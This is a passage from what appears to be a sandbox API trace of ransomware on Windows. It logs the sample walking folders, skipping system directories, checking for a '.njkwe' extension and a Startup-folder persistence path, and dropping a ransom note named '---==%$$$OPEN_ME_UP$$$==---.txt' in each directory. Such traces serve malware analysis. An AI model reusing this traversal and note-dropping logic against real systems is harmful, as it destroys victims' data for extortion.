nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0072.857] lstrcmpiW (lpString1="overlay.png", lpString2="Windows") returned -1 [0072.857] lstrcmpiW (lpString1="overlay.png", lpString2="$Recycle.bin") returned 1 [0072.857] lstrcmpiW (lpString1="overlay.png", lpString2="System Volume Information") returned -1 [0072.857] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files") returned -1 [0072.857] lstrcmpiW (lpString1="overlay.png", lpString2="Program Files (x86)") returned -1 [0072.857] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0072.857] StrStrIW (lpFirst="overlay.png", lpSrch=".njkwe") returned 0x0 [0072.857] lstrcmpW (lpString1="overlay.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.858] lstrcmpW (lpString1="overlay.png", lpString2="taridd") returned -1 [0072.858] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.858] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.860] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0072.860] lstrcmpiW (lpString1="superbar.png", lpString2="Windows") returned -1 [0072.860] lstrcmpiW (lpString1="superbar.png", lpString2="$Recycle.bin") returned 1 [0072.860] lstrcmpiW (lpString1="superbar.png", lpString2="System Volume Information") returned -1 [0072.860] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files") returned 1 [0072.860] lstrcmpiW (lpString1="superbar.png", lpString2="Program Files (x86)") returned 1 [0072.860] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0072.860] StrStrIW (lpFirst="superbar.png", lpSrch=".njkwe") returned 0x0 [0072.860] lstrcmpW (lpString1="superbar.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.860] lstrcmpW (lpString1="superbar.png", lpString2="taridd") returned -1 [0072.860] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.860] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.861] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0072.861] FindClose (in: hFindFile=0xc19ca0 | out: hFindFile=0xc19ca0) returned 1 [0072.862] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 119 [0072.862] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.863] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.864] CloseHandle (hObject=0x434) returned 1 [0072.864] GetProcessHeap () returned 0xbe0000 [0072.864] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.864] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd554496, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0072.864] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Windows") returned -1 [0072.864] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="$Recycle.bin") returned 1 [0072.864] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="System Volume Information") returned -1 [0072.864] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files") returned -1 [0072.864] lstrcmpiW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="Program Files (x86)") returned -1 [0072.864] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0072.864] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2=".") returned 1 [0072.864] lstrcmpW (lpString1="{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="..") returned 1 [0072.864] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.864] GetProcessHeap () returned 0xbe0000 [0072.864] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.864] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned 89 [0072.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd554496, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0072.865] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.865] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.865] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.865] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.865] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.865] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\.") returned 89 [0072.865] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.865] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd554496, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.865] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.865] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.865] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.865] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.865] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.865] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\..") returned 90 [0072.865] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.865] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.865] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="background.png", cAlternateFileName="")) returned 1 [0072.865] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0072.865] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0072.865] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0072.865] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0072.865] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0072.865] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0072.865] StrStrIW (lpFirst="background.png", lpSrch=".njkwe") returned 0x0 [0072.865] lstrcmpW (lpString1="background.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.865] lstrcmpW (lpString1="background.png", lpString2="taridd") returned -1 [0072.865] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.865] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.868] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0072.868] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0072.868] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0072.868] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0072.868] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0072.868] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0072.868] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0072.868] StrStrIW (lpFirst="behavior.xml", lpSrch=".njkwe") returned 0x0 [0072.868] lstrcmpW (lpString1="behavior.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.868] lstrcmpW (lpString1="behavior.xml", lpString2="taridd") returned -1 [0072.868] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.868] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.868] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0072.868] lstrcmpiW (lpString1="watermark.png", lpString2="Windows") returned -1 [0072.868] lstrcmpiW (lpString1="watermark.png", lpString2="$Recycle.bin") returned 1 [0072.868] lstrcmpiW (lpString1="watermark.png", lpString2="System Volume Information") returned 1 [0072.868] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files") returned 1 [0072.868] lstrcmpiW (lpString1="watermark.png", lpString2="Program Files (x86)") returned 1 [0072.868] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0072.868] StrStrIW (lpFirst="watermark.png", lpSrch=".njkwe") returned 0x0 [0072.868] lstrcmpW (lpString1="watermark.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.868] lstrcmpW (lpString1="watermark.png", lpString2="taridd") returned 1 [0072.868] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.868] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.868] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4933c6a8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4933c6a8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4933c6a8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0072.869] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0072.869] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 119 [0072.869] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.870] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0072.871] CloseHandle (hObject=0x434) returned 1 [0072.871] GetProcessHeap () returned 0xbe0000 [0072.871] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.871] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd554496, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0072.871] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0072.875] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0072.875] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.877] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.878] CloseHandle (hObject=0x430) returned 1 [0072.878] GetProcessHeap () returned 0xbe0000 [0072.878] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.878] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd555071, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Task", cAlternateFileName="")) returned 1 [0072.878] lstrcmpiW (lpString1="Task", lpString2="Windows") returned -1 [0072.878] lstrcmpiW (lpString1="Task", lpString2="$Recycle.bin") returned 1 [0072.878] lstrcmpiW (lpString1="Task", lpString2="System Volume Information") returned 1 [0072.878] lstrcmpiW (lpString1="Task", lpString2="Program Files") returned 1 [0072.878] lstrcmpiW (lpString1="Task", lpString2="Program Files (x86)") returned 1 [0072.878] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0072.878] lstrcmpW (lpString1="Task", lpString2=".") returned 1 [0072.878] lstrcmpW (lpString1="Task", lpString2="..") returned 1 [0072.878] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.878] GetProcessHeap () returned 0xbe0000 [0072.878] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.878] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned 48 [0072.878] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd555071, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0072.878] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.878] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.878] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.878] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.878] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.878] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\.") returned 48 [0072.878] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.878] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd555071, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.879] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.879] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.879] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.879] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.879] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.879] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\..") returned 49 [0072.879] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.879] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.879] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd5f4a5c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b27bb25, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0072.879] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Windows") returned -1 [0072.879] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="$Recycle.bin") returned 1 [0072.879] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="System Volume Information") returned -1 [0072.879] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files") returned -1 [0072.879] lstrcmpiW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="Program Files (x86)") returned -1 [0072.879] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0072.879] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1 [0072.879] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1 [0072.879] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device 